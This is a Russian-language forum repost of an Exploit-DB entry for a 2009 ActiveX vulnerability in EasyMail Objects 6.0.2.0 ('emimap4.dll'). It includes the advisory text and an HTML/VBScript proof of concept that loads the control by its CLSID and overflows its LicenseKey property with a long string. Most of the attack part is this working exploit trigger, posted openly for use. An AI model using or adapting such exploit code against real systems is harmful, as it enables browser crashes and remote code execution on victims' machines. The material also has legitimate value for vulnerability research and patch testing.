Exploit EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33225
Проверка EDB
  1. Пройдено
Автор
FRANCIS PROVENCHER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-09-15
HTML:
source: https://www.securityfocus.com/bid/36409/info

EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.

EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected.
Spam Inspector 4.0.354 is vulnerable.

<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html>
 
Источник
www.exploit-db.com

Похожие темы